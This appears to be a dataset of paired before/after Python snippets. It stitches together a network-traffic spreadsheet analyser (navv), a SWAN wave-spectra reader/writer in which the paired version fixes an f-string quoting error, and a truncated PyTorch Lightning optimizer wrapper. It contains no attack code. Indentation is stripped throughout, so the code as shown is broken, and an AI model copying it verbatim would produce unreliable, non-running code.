desc_to_change = (resolution, EXTERNAL_NETWORK_CELL_COLOR)
return desc_to_change
def write_conn_states_sheet(conn_states, wb):
new_ws = make_sheet(wb, "Conn_States", idx=8)
new_ws.append(["State", "Description"])
for row_num, conn_state in enumerate(conn_states, start=2):
state_cell = new_ws[f"A{row_num}"]
desc_cell = new_ws[f"B{row_num}"]
state_cell.value = conn_state
state_cell.fill = conn_states[conn_state][0]
state_cell.font = conn_states[conn_state][1]
desc_cell.value = conn_states[conn_state][2]
desc_cell.fill = conn_states[conn_state][0]
desc_cell.font = conn_states[conn_state][1]
auto_adjust_width(new_ws)
def write_macs_sheet(mac_dict, wb):
"""Fill spreadsheet with MAC address -> IP address translation with manufacturer information"""
macs_sheet = make_sheet(wb, "MACs", idx=4)
macs_sheet.append(["MAC", "Manufacturer", "IPs"])
for row_index, mac in enumerate(mac_dict, start=2):
macs_sheet[f"A{row_index}"].value = mac
try:
eui = netaddr.EUI(mac)
oui = eui.oui
orgs = [oui.registration(i).org for i in range(oui.reg_count)]
except netaddr.core.NotRegisteredError:
orgs = ["Not a registered manufacturer"]
except netaddr.core.AddrFormatError:
orgs = [f"Bad MAC address {mac}"]
except Exception:
orgs = ["Unspecified MAC error"]
macs_sheet[f"B{row_index}"].value = "\n".join(orgs)
ip_list_cell = macs_sheet[f"C{row_index}"]
ip_list_cell.alignment = openpyxl.styles.Alignment(wrap_text=True)
num_ips = len(mac_dict[mac])
if num_ips > 10:
display_list = mac_dict[mac][:10]
display_list.append(f"Displaying 10 IPs of {num_ips}")
ip_list_cell.value = "\n".join(display_list)
else:
ip_list_cell.value = "\n".join(mac_dict[mac][:10])
macs_sheet.row_dimensions[row_index].height = min(num_ips, 11) * 15
if row_index % 2 == 0:
for cell in macs_sheet[f"{row_index}:{row_index}"]:
cell.fill = openpyxl.styles.PatternFill("solid", fgColor="AAAAAA")
auto_adjust_width(macs_sheet)
macs_sheet.column_dimensions["C"].width = 39 * 1.2
def write_externals_sheet(IPs, wb):
ext_sheet = make_sheet(wb, "Externals", idx=5)
ext_sheet.append(["External IP"])
for row_index, IP in enumerate(sorted(IPs), start=2):
cell = ext_sheet[f"A{row_index}"]
cell.value = IP
if row_index % 2 == 0:
cell.fill = openpyxl.styles.PatternFill("solid", fgColor="AAAAAA")
auto_adjust_width(ext_sheet)
def write_unknown_internals_sheet(IPs, wb):
int_sheet = make_sheet(wb, "Unkown_Internals", idx=6)
int_sheet.append(["Unknown Internal IP"])
for row_index, IP in enumerate(sorted(IPs), start=2):
cell = int_sheet[f"A{row_index}"]
cell.value = IP
if row_index % 2 == 0:
cell.fill = openpyxl.styles.PatternFill("solid", fgColor="AAAAAA")
auto_adjust_width(int_sheet)
def write_stats_sheet(wb, stats):
stats_sheet = make_sheet(wb, "Stats", idx=7)
stats_sheet.append(["Length of Capture time"] + [column for column in stats if column != "Length of Capture time"])
stats_sheet["A2"] = stats.pop("Length of Capture time")
for col_index, stat in enumerate(stats, 1):
stats_sheet[f"{string.ascii_uppercase[col_index]}2"].value = stats[stat]
auto_adjust_width(stats_sheet)
def make_sheet(wb, sheet_name, idx=None):
"""Create the sheet if it doesn't already exist otherwise remove it and recreate it"""
if sheet_name in wb.sheetnames:
wb.remove(wb[sheet_name])
return wb.create_sheet(sheet_name, index=idx)
def auto_adjust_width(sheet):
factor = 1.7
for col in sheet.columns:
vals = (len("{}".format(c.value)) for c in col if c.value is not None)
max_width = max(vals) * factor
sheet.column_dimensions[col[0].column_letter].width = max_width if max_width < 20 else max_width * 1.2 / 1.7
| #!/usr/bin/env python3
# Copyright 2021 Battelle Energy Alliance, LLC
import os
import itertools
from collections import Counter
import socket
from copy import copy
import pkg_resources
import pickle
import string
import openpyxl
import openpyxl.styles
from openpyxl.worksheet.table import Table
import netaddr
from tqdm import tqdm
from navv import data_types
from navv import utilities
DATA_PKL_FILE = pkg_resources.resource_filename(__name__, "data/data.pkl")
COL_NAMES = [
"Count",
"Src_IP",
"Src_Desc",
"Dest_IP",
"Dest_Desc",
"Port",
"Service",
"Proto",
"Conn_State",
"Notes",
]
HEADER_STYLE = openpyxl.styles.NamedStyle(
name="header_style",
font=openpyxl.styles.Font(name="Calibri", size=11, bold=True),
fill=openpyxl.styles.PatternFill("solid", fgColor="4286F4"),
)
IPV6_CELL_COLOR = (
openpyxl.styles.PatternFill("solid", fgColor="FFFFFF"),
openpyxl.styles.Font(name="Calibri", size=11, color="ff0000"),
)
EXTERNAL_NETWORK_CELL_COLOR = (
openpyxl.styles.PatternFill("solid", fgColor="030303"),
openpyxl.styles.Font(name="Calibri", size=11, color="ffff00"),
)
INTERNAL_NETWORK_CELL_COLOR = (
openpyxl.styles.PatternFill("solid", fgColor="ffff00"),
openpyxl.styles.Font(name="Calibri", size=11, color="000000"),
)
ICMP_CELL_COLOR = (
openpyxl.styles.PatternFill("solid", fgColor="ff33cc"),
openpyxl.styles.Font(name="Calibri", size=11, color="000000"),
)
UNKNOWN_EXTERNAL_CELL_COLOR = (
openpyxl.styles.PatternFill("solid", fgColor="ffffff"),
openpyxl.styles.Font(name="Calibri", size=11, color="000000"),
)
ALREADY_UNRESOLVED = list()
def get_workbook(file_name):
"""Create the blank Inventory and Segment sheets for data input into the tool"""
if os.path.isfile(file_name):
wb = openpyxl.load_workbook(file_name)
else:
wb = openpyxl.Workbook()
inv_sheet = wb.active
inv_sheet.title = "Inventory"
seg_sheet = wb.create_sheet("Segments")
inv_sheet.cell(row=1, column=1, value="IP").style = HEADER_STYLE
inv_sheet.cell(row=1, column=2, value="Name").style = HEADER_STYLE
seg_sheet.cell(row=1, column=1, value="Name").style = HEADER_STYLE
seg_sheet.cell(row=1, column=2, value="Description").style = HEADER_STYLE
seg_sheet.cell(row=1, column=3, value="CIDR").style = HEADER_STYLE
return wb
@utilities.timeit
def get_inventory_data(ws, **kwargs):
inventory = dict()
for row in itertools.islice(ws.iter_rows(), 1, None):
if not row[0].value or not row[1].value:
continue
inventory[row[0].value] = data_types.InventoryItem(
ip=row[0].value,
name=row[1].value,
color=(copy(row[0].fill), copy(row[0].font)),
)
return inventory
@utilities.timeit
def get_segments_data(ws):
segments = list()
for row in itertools.islice(ws.iter_rows(), 1, None):
if not row[2].value:
continue
segments.append(
data_types.Segment(
name=row[0].value,
description=row[1].value,
network=row[2].value,
color=[copy(row[0].fill), copy(row[0].font)],
)
)
all_ips = []
for segment in segments:
all_ips = all_ips + segment.network
segments.append(all_ips)
return segments
def get_package_data():
"""Load services and conn_states data into memory"""
with open(DATA_PKL_FILE, "rb") as f:
services, conn_states = pickle.load(f)
return services, conn_states
@utilities.timeit
def create_analysis_array(sort_input, **kwargs):
arr = list()
mac_dict = dict()
# sort by count and source IP
counted = sorted(
list(str(count) + "\t" + item for item, count in sorted(Counter(sort_input).items(), key=lambda x: x[0])),
key=lambda x: int(x.split("\t")[0]),
reverse=True,
)
for row in counted:
cells = row.split("\t")
arr.append(
data_types.AnalysisRowItem(
count=cells[0],
src_ip=cells[1],
dest_ip=cells[2],
port=cells[3],
proto=cells[4],
conn=cells[5],
)
)
if cells[6] is not None and cells[6] != "":
if netaddr.IPAddress(cells[1]).is_private():
if cells[6] not in mac_dict:
mac_dict[cells[6]] = [cells[1]]
else:
if cells[1] not in mac_dict[cells[6]]:
mac_dict[cells[6]].append(cells[1])
return arr, mac_dict
@utilities.timeit
def perform_analysis(
wb,
rows,
services,
conn_states,
inventory,
segments,
dns_data,
pkl_path,
ext_IPs,
unk_int_IPs,
**kwargs,
):
sheet = make_sheet(wb, "Analysis", idx=0)
sheet.append(
[
"Count",
"Src_IP",
"Src_Desc",
"Dest_IP",
"Dest_Desc",
"Port",
"Service",
"Proto",
"Conn_State",
"Notes",
]
)
print("Performing analysis(including lookups). This may take a while:")
for row_index, row in enumerate(tqdm(rows), start=2):
row.src_desc = handle_ip(row.src_ip, dns_data, inventory, segments, ext_IPs, unk_int_IPs)
row.dest_desc = handle_ip(row.dest_ip, dns_data, inventory, segments, ext_IPs, unk_int_IPs)
handle_service(row, services)
row.conn = (row.conn, conn_states[row.conn])
write_row_to_sheet(row, row_index, sheet)
tab = Table(displayName="AnalysisTable", ref=f"A1:J{len(rows)+1}")
sheet.add_table(tab)
# pickle the lookupdata for future use
with open(pkl_path, "wb") as pkl:
pickle.dump(dns_data, pkl)
def write_row_to_sheet(row, row_index, sheet):
sheet.cell(row=row_index, column=1, value=int(row.count))
src_IP = sheet.cell(row=row_index, column=2, value=row.src_ip)
src_IP.fill = row.src_desc[1][0]
src_IP.font = row.src_desc[1][1]
src_Desc = sheet.cell(row=row_index, column=3, value=row.src_desc[0])
src_Desc.fill = row.src_desc[1][0]
src_Desc.font = row.src_desc[1][1]
dest_IP = sheet.cell(row=row_index, column=4, value=row.dest_ip)
dest_IP.fill = row.dest_desc[1][0]
dest_IP.font = row.dest_desc[1][1]
dest_Desc = sheet.cell(row=row_index, column=5, value=row.dest_desc[0])
dest_Desc.fill = row.dest_desc[1][0]
dest_Desc.font = row.dest_desc[1][1]
sheet.cell(row=row_index, column=6, value=int(row.port))
service = sheet.cell(row=row_index, column=7, value=row.service[0])
service.fill = row.service[1][0]
service.font = row.service[1][1]
sheet.cell(row=row_index, column=8, value=row.proto)
conn_State = sheet.cell(row=row_index, column=9, value=row.conn[0])
conn_State.fill = row.conn[1][0]
conn_State.font = row.conn[1][1]
# placeholder for notes cell
sheet.cell(row=row_index, column=10, value="")
def handle_service(row, services):
# { port: { proto: (name, (fill, font)} }
if row.port in services and row.proto in services[row.port]:
row.service = services[row.port][row.proto]
else:
if row.proto == "icmp":
if netaddr.valid_ipv4(row.src_ip):
row.proto = "ICMPv4"
service_dict = data_types.icmp4_types
else:
row.proto = "ICMPv6"
service_dict = data_types.icmp6_types
if row.port in service_dict:
row.service = (service_dict[row.port], ICMP_CELL_COLOR)
else:
row.service = ("unknown icmp", ICMP_CELL_COLOR)
else:
row.service = ("unknown service", UNKNOWN_EXTERNAL_CELL_COLOR)
def handle_ip(ip_to_check, dns_data, inventory, segments, ext_IPs, unk_int_IPs):
"""Function take IP Address and uses collected dns_data, inventory, and segment information to give IP Addresses in analysis context.
Priority flow:
* DHCP Broadcasting
* Multicast
* Within Segments identified
* Within Inventory, not within an Identified Segment
* Private Network
* External (Public IP space) or Internet
This will capture the name description and the color coding identified within the worksheet.
"""
#
if ip_to_check == str("0.0.0.0"):
desc_to_change = (
"Unassigned IPv4",
IPV6_CELL_COLOR,
)
elif ip_to_check == str("255.255.255.255"):
desc_to_change = (
"IPv4 All Subnet Broadcast",
IPV6_CELL_COLOR,
)
elif netaddr.valid_ipv6(ip_to_check) or netaddr.IPAddress(ip_to_check).is_multicast():
desc_to_change = (
f"{'IPV6' if netaddr.valid_ipv6(ip_to_check) else 'IPV4'}{'_Multicast' if netaddr.IPAddress(ip_to_check).is_multicast() else ''}",
IPV6_CELL_COLOR,
)
elif ip_to_check in segments[len(segments) - 1]:
for segment in segments[:-1]:
if ip_to_check not in segment.network:
continue
if ip_to_check in dns_data:
desc_to_change = (dns_data[ip_to_check], segment.color)
if ip_to_check in inventory:
desc_to_change = (inventory[ip_to_check].name, segment.color)
else:
desc_to_change = (
f"Unknown device in {segment.name} network",
segment.color,
)
unk_int_IPs.add(ip_to_check)
elif ip_to_check in inventory:
desc_to_change = (inventory[ip_to_check].name, inventory[ip_to_check].color)
elif netaddr.IPAddress(ip_to_check).is_private():
if ip_to_check in dns_data:
desc_to_change = (dns_data[ip_to_check], INTERNAL_NETWORK_CELL_COLOR)
else:
desc_to_change = ("Unknown Internal address", INTERNAL_NETWORK_CELL_COLOR)
unk_int_IPs.add(ip_to_check)
else:
ext_IPs.add(ip_to_check)
if ip_to_check in dns_data:
resolution = dns_data[ip_to_check]
else:
try:
resolution = socket.gethostbyaddr(ip_to_check)[0]
except socket.herror:
resolution = "Unresolved external address"
ALREADY_UNRESOLVED.append(ip_to_check)
finally:
dns_data[ip_to_check] = resolution
desc_to_change = (resolution, EXTERNAL_NETWORK_CELL_COLOR)
return desc_to_change
def write_conn_states_sheet(conn_states, wb):
new_ws = make_sheet(wb, "Conn_States", idx=8)
new_ws.append(["State", "Description"])
for row_num, conn_state in enumerate(conn_states, start=2):
state_cell = new_ws[f"A{row_num}"]
desc_cell = new_ws[f"B{row_num}"]
state_cell.value = conn_state
state_cell.fill = conn_states[conn_state][0]
state_cell.font = conn_states[conn_state][1]
desc_cell.value = conn_states[conn_state][2]
desc_cell.fill = conn_states[conn_state][0]
desc_cell.font = conn_states[conn_state][1]
auto_adjust_width(new_ws)
def write_macs_sheet(mac_dict, wb):
"""Fill spreadsheet with MAC address -> IP address translation with manufacturer information"""
macs_sheet = make_sheet(wb, "MACs", idx=4)
macs_sheet.append(["MAC", "Manufacturer", "IPs"])
for row_index, mac in enumerate(mac_dict, start=2):
macs_sheet[f"A{row_index}"].value = mac
try:
eui = netaddr.EUI(mac)
oui = eui.oui
orgs = [oui.registration(i).org for i in range(oui.reg_count)]
except netaddr.core.NotRegisteredError:
orgs = ["Not a registered manufacturer"]
except netaddr.core.AddrFormatError:
orgs = [f"Bad MAC address {mac}"]
except Exception:
orgs = ["Unspecified MAC error"]
macs_sheet[f"B{row_index}"].value = "\n".join(orgs)
ip_list_cell = macs_sheet[f"C{row_index}"]
ip_list_cell.alignment = openpyxl.styles.Alignment(wrap_text=True)
num_ips = len(mac_dict[mac])
if num_ips > 10:
display_list = mac_dict[mac][:10]
display_list.append(f"Displaying 10 IPs of {num_ips}")
ip_list_cell.value = "\n".join(display_list)
else:
ip_list_cell.value = "\n".join(mac_dict[mac][:10])
macs_sheet.row_dimensions[row_index].height = min(num_ips, 11) * 15
if row_index % 2 == 0:
for cell in macs_sheet[f"{row_index}:{row_index}"]:
cell.fill = openpyxl.styles.PatternFill("solid", fgColor="AAAAAA")
auto_adjust_width(macs_sheet)
macs_sheet.column_dimensions["C"].width = 39 * 1.2
def write_externals_sheet(IPs, wb):
ext_sheet = make_sheet(wb, "Externals", idx=5)
ext_sheet.append(["External IP"])
for row_index, IP in enumerate(sorted(IPs), start=2):
cell = ext_sheet[f"A{row_index}"]
cell.value = IP
if row_index % 2 == 0:
cell.fill = openpyxl.styles.PatternFill("solid", fgColor="AAAAAA")
auto_adjust_width(ext_sheet)
def write_unknown_internals_sheet(IPs, wb):
int_sheet = make_sheet(wb, "Unkown_Internals", idx=6)
int_sheet.append(["Unknown Internal IP"])
for row_index, IP in enumerate(sorted(IPs), start=2):
cell = int_sheet[f"A{row_index}"]
cell.value = IP
if row_index % 2 == 0:
cell.fill = openpyxl.styles.PatternFill("solid", fgColor="AAAAAA")
auto_adjust_width(int_sheet)
def write_stats_sheet(wb, stats):
stats_sheet = make_sheet(wb, "Stats", idx=7)
stats_sheet.append(["Length of Capture time"] + [column for column in stats if column != "Length of Capture time"])
stats_sheet["A2"] = stats.pop("Length of Capture time")
for col_index, stat in enumerate(stats, 1):
stats_sheet[f"{string.ascii_uppercase[col_index]}2"].value = stats[stat]
auto_adjust_width(stats_sheet)
def make_sheet(wb, sheet_name, idx=None):
"""Create the sheet if it doesn't already exist otherwise remove it and recreate it"""
if sheet_name in wb.sheetnames:
wb.remove(wb[sheet_name])
return wb.create_sheet(sheet_name, index=idx)
def auto_adjust_width(sheet):
factor = 1.7
for col in sheet.columns:
vals = (len("{}".format(c.value)) for c in col if c.value is not None)
max_width = max(vals) * factor
sheet.column_dimensions[col[0].column_letter].width = max_width if max_width < 20 else max_width * 1.2 / 1.7
|
"""Read and write swan spectra files"""
import os
import re
import gzip
import datetime
import pandas as pd
import numpy as np
from wavespectra.core.attributes import attrs
from wavespectra.core.utils import to_nautical
E2V = 1025 * 9.81
class SwanSpecFile(object):
"""Read spectra in SWAN ASCII format."""
def __init__(
self,
filename,
freqs=None,
dirs=None,
x=None,
y=None,
time=False,
id="Swan Spectrum",
dirorder=False,
append=False,
tabfile=None,
):
self.times = False
self.filename = filename
self.tabfile = (
tabfile or os.path.splitext(self.filename.replace(".gz", ""))[0] + ".tab"
)
self.is_tab = False
self.buf = None
extention = os.path.splitext(self.filename)[-1]
if extention == ".gz":
fopen = gzip.open
else:
fopen = open
if freqs is not None: # Writable file
self.freqs = np.array(freqs)
self.dirs = np.array(dirs)
self.x = np.array(x)
self.y = np.array(y)
if time:
self.times = []
self.fid = fopen(filename, "w")
self.write_header(time, id)
self.fmt = len(self.dirs) * "{:5.0f}"
else:
self.fid = fopen(filename, "r+" if append else "r")
self._read_header("SWAN")
while True:
if not self._read_header("$"):
break
if self._read_header("TIME"):
self._read_header("1")
self.times = []
self.x = []
self.y = []
locs = self._read_header("LONLAT", True) or self._read_header(
"LOCATIONS", True
)
for ip in locs:
xy = [float(val) for val in ip.split()]
self.x.append(xy[0])
self.y.append(xy[1])
self.x = np.array(self.x)
self.y = np.array(self.y)
self.afreq = self._read_header("AFREQ", True)
self.rfreq = self._read_header("RFREQ", True)
self.ndir = self._read_header("NDIR", True)
self.cdir = self._read_header("CDIR", True)
if self.afreq:
self.freqs = np.array([float(val) for val in self.afreq])
else:
self.freqs = np.array([float(val) for val in self.rfreq])
if self.ndir:
self.dirs = np.array([float(val) for val in self.ndir])
else:
self.dirs = to_nautical(np.array([float(val) for val in self.cdir]))
self._read_header("QUANT", True)
# Figure units out, if Energy density factor needs to be applied
units = self.fid.readline().strip().split()[0]
if units.upper().startswith("J"):
self.units_factor = E2V
else:
self.units_factor = 1.0
self.excval = int(float(self.fid.readline().split()[0]))
if dirorder:
self.dirmap = list(np.argsort(self.dirs % 360.0))
self.dirs = self.dirs[self.dirmap] % 360.0
else:
self.dirmap = False
lons = np.unique(self.x)
lats = np.unique(self.y)
self.is_grid = len(lons) * len(lats) == len(self.x)
self.is_tab = (os.path.isfile(self.tabfile)) & (len(lons) * len(lats) == 1)
def _read_header(self, keyword, numspec=False):
if not self.buf:
self.buf = self.fid.readline()
if self.buf.find(keyword) >= 0:
if numspec:
line = self.fid.readline()
n = int(re.findall(r"\b(\d+)\b", line)[0])
self.buf = [self.fid.readline() for i in range(0, n)]
rtn = self.buf
self.buf = None
else:
rtn = False
return rtn
def read(self):
"""Read single timestep from current position in file."""
if not self.fid:
return None
if isinstance(self.times, list):
line = self.fid.readline()
if line:
ttime = datetime.datetime.strptime(line[0:15], "%Y%m%d.%H%M%S")
self.times.append(ttime)
else:
return None
Sout = []
for ip, pp in enumerate(self.x):
Snew = np.nan * np.zeros((len(self.freqs), len(self.dirs)))
if self._read_header("NODATA"):
pass
else:
if self._read_header("ZERO"):
Snew = np.zeros((len(self.freqs), len(self.dirs)))
elif self._read_header("FACTOR"):
fac = float(self.fid.readline())
for i, f in enumerate(self.freqs):
line = self.fid.readline()
lsplit = line.split()
try:
Snew[i, :] = [float(val) for val in lsplit]
except Exception:
import warnings
warnings.warn("Check what this is supposed to be doing.")
pass
Snew *= fac
if self.dirmap:
Snew = Snew[:, self.dirmap]
else: # For files with no timestamp
return None
Sout.append(Snew / self.units_factor)
return Sout
def readall(self):
"""Read the entire file."""
while True:
sset = self.read()
if sset:
yield sset
else:
break
def write_header(self, time=False, str1="", str2="", timecode=1, excval=-99):
"""Write header to file."""
# Description
strout = "{:40}{}\n".format("SWAN 1", "Swan standard spectral file")
strout += "{:4}{}\n".format("$", str1)
strout += "{:4}{}\n".format("$", str2)
# Time
if time:
strout += "{:40}{}\n".format("TIME", "time-dependent data")
strout += "{:>6d}{:34}{}\n".format(timecode, "", "time coding option")
# Location
strout += "{:40}{}\n".format("LONLAT", "locations in spherical coordinates")
strout += "{:>6d}{:34}{}\n".format(len(self.x), "", "number of locations")
for x, y in zip(self.x, self.y):
strout += "{:2}{:<0.6f}{:2}{:<0.6f}\n".format("", x, "", y)
# Frequency
strout += "{:40}{}\n".format("AFREQ", "absolute frequencies in Hz")
strout += "{:6d}{:34}{}\n".format(len(self.freqs), "", "number of frequencies")
for freq in self.freqs:
strout += "{:>11.5f}\n".format(freq)
# Direction
strout += "{:40}{}\n".format("NDIR", "spectral nautical directions in degr")
strout += "{:6d}{:34}{}\n".format(len(self.dirs), "", "number of directions")
for wdir in self.dirs:
strout += "{:>11.4f}\n".format(wdir)
# Data
strout += "QUANT\n{:>6d}{:34}{}\n".format(
1, "", "number of quantities in table"
)
strout += "{:40}{}\n".format("VaDens", "variance densities in m2/Hz/degr")
strout += "{:40}{}\n".format("m2/Hz/degr", "unit")
strout += "{:3}{:<37g}{}\n".format("", excval, "exception value")
# Dumping
self.fid.write(strout)
def write_spectra(self, arr, time=None):
"""Write spectra from single timestamp.
Args:
arr (3D ndarray): spectra to write S(site, freq, dim).
time (yyymmdd.HHMMSS): time of spectra to write.
"""
if time is not None:
self.fid.write(f"{time:40}{"date and time"}\n")
for spec in arr:
fac = spec.max() / 9998.0
if np.isnan(fac):
self.fid.write("NODATA\n")
elif fac <= 0:
self.fid.write("ZERO\n")
else:
self.fid.write(f"FACTOR\n{"":4}{fac:0.8E}\n")
np.savetxt(self.fid, spec / fac, fmt="%5.0f", delimiter="")
def close(self):
"""Close file handle."""
if self.fid:
self.fid.close()
self.fid = False
def read_tab(filename, toff=0):
"""Read swan table file.
Args:
filename (str): name of SWAN tab file to read
toff (float): timezone offset in hours
Returns:
Pandas DataFrame object
"""
df = pd.read_csv(
filename,
delim_whitespace=True,
skiprows=[0, 1, 2, 3, 5, 6],
parse_dates=[0],
date_parser=_dateparse,
index_col=0,
)
df.index.name = attrs.TIMENAME
df.index = df.index.shift(toff, freq="1H")
for col1, col2 in zip(df.columns[-1:0:-1], df.columns[-2::-1]):
df = df.rename(columns={col2: col1})
return df.iloc[:, 0:-1]
def _dateparse(x):
"""Date parsing to read SWAN tab files."""
return datetime.datetime.strptime(x, "%Y%m%d.%H%M%S")
| """Read and write swan spectra files"""
import os
import re
import gzip
import datetime
import pandas as pd
import numpy as np
from wavespectra.core.attributes import attrs
from wavespectra.core.utils import to_nautical
E2V = 1025 * 9.81
class SwanSpecFile(object):
"""Read spectra in SWAN ASCII format."""
def __init__(
self,
filename,
freqs=None,
dirs=None,
x=None,
y=None,
time=False,
id="Swan Spectrum",
dirorder=False,
append=False,
tabfile=None,
):
self.times = False
self.filename = filename
self.tabfile = (
tabfile or os.path.splitext(self.filename.replace(".gz", ""))[0] + ".tab"
)
self.is_tab = False
self.buf = None
extention = os.path.splitext(self.filename)[-1]
if extention == ".gz":
fopen = gzip.open
else:
fopen = open
if freqs is not None: # Writable file
self.freqs = np.array(freqs)
self.dirs = np.array(dirs)
self.x = np.array(x)
self.y = np.array(y)
if time:
self.times = []
self.fid = fopen(filename, "w")
self.write_header(time, id)
self.fmt = len(self.dirs) * "{:5.0f}"
else:
self.fid = fopen(filename, "r+" if append else "r")
self._read_header("SWAN")
while True:
if not self._read_header("$"):
break
if self._read_header("TIME"):
self._read_header("1")
self.times = []
self.x = []
self.y = []
locs = self._read_header("LONLAT", True) or self._read_header(
"LOCATIONS", True
)
for ip in locs:
xy = [float(val) for val in ip.split()]
self.x.append(xy[0])
self.y.append(xy[1])
self.x = np.array(self.x)
self.y = np.array(self.y)
self.afreq = self._read_header("AFREQ", True)
self.rfreq = self._read_header("RFREQ", True)
self.ndir = self._read_header("NDIR", True)
self.cdir = self._read_header("CDIR", True)
if self.afreq:
self.freqs = np.array([float(val) for val in self.afreq])
else:
self.freqs = np.array([float(val) for val in self.rfreq])
if self.ndir:
self.dirs = np.array([float(val) for val in self.ndir])
else:
self.dirs = to_nautical(np.array([float(val) for val in self.cdir]))
self._read_header("QUANT", True)
# Figure units out, if Energy density factor needs to be applied
units = self.fid.readline().strip().split()[0]
if units.upper().startswith("J"):
self.units_factor = E2V
else:
self.units_factor = 1.0
self.excval = int(float(self.fid.readline().split()[0]))
if dirorder:
self.dirmap = list(np.argsort(self.dirs % 360.0))
self.dirs = self.dirs[self.dirmap] % 360.0
else:
self.dirmap = False
lons = np.unique(self.x)
lats = np.unique(self.y)
self.is_grid = len(lons) * len(lats) == len(self.x)
self.is_tab = (os.path.isfile(self.tabfile)) & (len(lons) * len(lats) == 1)
def _read_header(self, keyword, numspec=False):
if not self.buf:
self.buf = self.fid.readline()
if self.buf.find(keyword) >= 0:
if numspec:
line = self.fid.readline()
n = int(re.findall(r"\b(\d+)\b", line)[0])
self.buf = [self.fid.readline() for i in range(0, n)]
rtn = self.buf
self.buf = None
else:
rtn = False
return rtn
def read(self):
"""Read single timestep from current position in file."""
if not self.fid:
return None
if isinstance(self.times, list):
line = self.fid.readline()
if line:
ttime = datetime.datetime.strptime(line[0:15], "%Y%m%d.%H%M%S")
self.times.append(ttime)
else:
return None
Sout = []
for ip, pp in enumerate(self.x):
Snew = np.nan * np.zeros((len(self.freqs), len(self.dirs)))
if self._read_header("NODATA"):
pass
else:
if self._read_header("ZERO"):
Snew = np.zeros((len(self.freqs), len(self.dirs)))
elif self._read_header("FACTOR"):
fac = float(self.fid.readline())
for i, f in enumerate(self.freqs):
line = self.fid.readline()
lsplit = line.split()
try:
Snew[i, :] = [float(val) for val in lsplit]
except Exception:
import warnings
warnings.warn("Check what this is supposed to be doing.")
pass
Snew *= fac
if self.dirmap:
Snew = Snew[:, self.dirmap]
else: # For files with no timestamp
return None
Sout.append(Snew / self.units_factor)
return Sout
def readall(self):
"""Read the entire file."""
while True:
sset = self.read()
if sset:
yield sset
else:
break
def write_header(self, time=False, str1="", str2="", timecode=1, excval=-99):
"""Write header to file."""
# Description
strout = "{:40}{}\n".format("SWAN 1", "Swan standard spectral file")
strout += "{:4}{}\n".format("$", str1)
strout += "{:4}{}\n".format("$", str2)
# Time
if time:
strout += "{:40}{}\n".format("TIME", "time-dependent data")
strout += "{:>6d}{:34}{}\n".format(timecode, "", "time coding option")
# Location
strout += "{:40}{}\n".format("LONLAT", "locations in spherical coordinates")
strout += "{:>6d}{:34}{}\n".format(len(self.x), "", "number of locations")
for x, y in zip(self.x, self.y):
strout += "{:2}{:<0.6f}{:2}{:<0.6f}\n".format("", x, "", y)
# Frequency
strout += "{:40}{}\n".format("AFREQ", "absolute frequencies in Hz")
strout += "{:6d}{:34}{}\n".format(len(self.freqs), "", "number of frequencies")
for freq in self.freqs:
strout += "{:>11.5f}\n".format(freq)
# Direction
strout += "{:40}{}\n".format("NDIR", "spectral nautical directions in degr")
strout += "{:6d}{:34}{}\n".format(len(self.dirs), "", "number of directions")
for wdir in self.dirs:
strout += "{:>11.4f}\n".format(wdir)
# Data
strout += "QUANT\n{:>6d}{:34}{}\n".format(
1, "", "number of quantities in table"
)
strout += "{:40}{}\n".format("VaDens", "variance densities in m2/Hz/degr")
strout += "{:40}{}\n".format("m2/Hz/degr", "unit")
strout += "{:3}{:<37g}{}\n".format("", excval, "exception value")
# Dumping
self.fid.write(strout)
def write_spectra(self, arr, time=None):
"""Write spectra from single timestamp.
Args:
arr (3D ndarray): spectra to write S(site, freq, dim).
time (yyymmdd.HHMMSS): time of spectra to write.
"""
if time is not None:
self.fid.write(f"{time:40}{'date and time'}\n")
for spec in arr:
fac = spec.max() / 9998.0
if np.isnan(fac):
self.fid.write("NODATA\n")
elif fac <= 0:
self.fid.write("ZERO\n")
else:
self.fid.write(f"FACTOR\n{'':4}{fac:0.8E}\n")
np.savetxt(self.fid, spec / fac, fmt="%5.0f", delimiter="")
def close(self):
"""Close file handle."""
if self.fid:
self.fid.close()
self.fid = False
def read_tab(filename, toff=0):
"""Read swan table file.
Args:
filename (str): name of SWAN tab file to read
toff (float): timezone offset in hours
Returns:
Pandas DataFrame object
"""
df = pd.read_csv(
filename,
delim_whitespace=True,
skiprows=[0, 1, 2, 3, 5, 6],
parse_dates=[0],
date_parser=_dateparse,
index_col=0,
)
df.index.name = attrs.TIMENAME
df.index = df.index.shift(toff, freq="1H")
for col1, col2 in zip(df.columns[-1:0:-1], df.columns[-2::-1]):
df = df.rename(columns={col2: col1})
return df.iloc[:, 0:-1]
def _dateparse(x):
"""Date parsing to read SWAN tab files."""
return datetime.datetime.strptime(x, "%Y%m%d.%H%M%S")
|
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from contextlib import contextmanager
from dataclasses import fields
from typing import Any, Callable, Dict, Generator, List, Optional, Tuple, Union
from weakref import proxy
import torch
from torch import optim
from torch.optim import Optimizer
import pytorch_lightning as pl
from pytorch_lightning.utilities.exceptions import MisconfigurationException
from pytorch_lightning.utilities.model_helpers import is_overridden
from pytorch_lightning.utilities.rank_zero import rank_zero_warn
from pytorch_lightning.utilities.types import _Stateful, LRSchedulerConfig, LRSchedulerTypeTuple, ReduceLROnPlateau
def do_nothing_closure() -> None:
return
class LightningOptimizer:
"""This class is used to wrap the user optimizers and handle properly the backward and optimizer_step logic
across accelerators, AMP, accumulate_grad_batches."""
def __init__(self, optimizer: Optimizer):
# copy most of the `Optimizer` methods into this instance. `__del__` is skipped in case the optimizer has
# implemented custom logic which we would not want to call on destruction of the `LightningOptimizer`
self.__dict__ = {k: v for k, v in optimizer.__dict__.items() if k not in ("step", "__del__")}
# For Horovod
if hasattr(optimizer, "skip_synchronize"):
self.__class__ = type(
"Lightning" + optimizer.__class__.__name__, (self.__class__, optimizer.__class__.__bases__[0]), {}
)
self.skip_synchronize = optimizer.skip_synchronize
self.synchronize = optimizer.synchronize
else:
self.__class__ = type("Lightning" + optimizer.__class__.__name__, (self.__class__, optimizer.__class__), {})
self._optimizer = optimizer
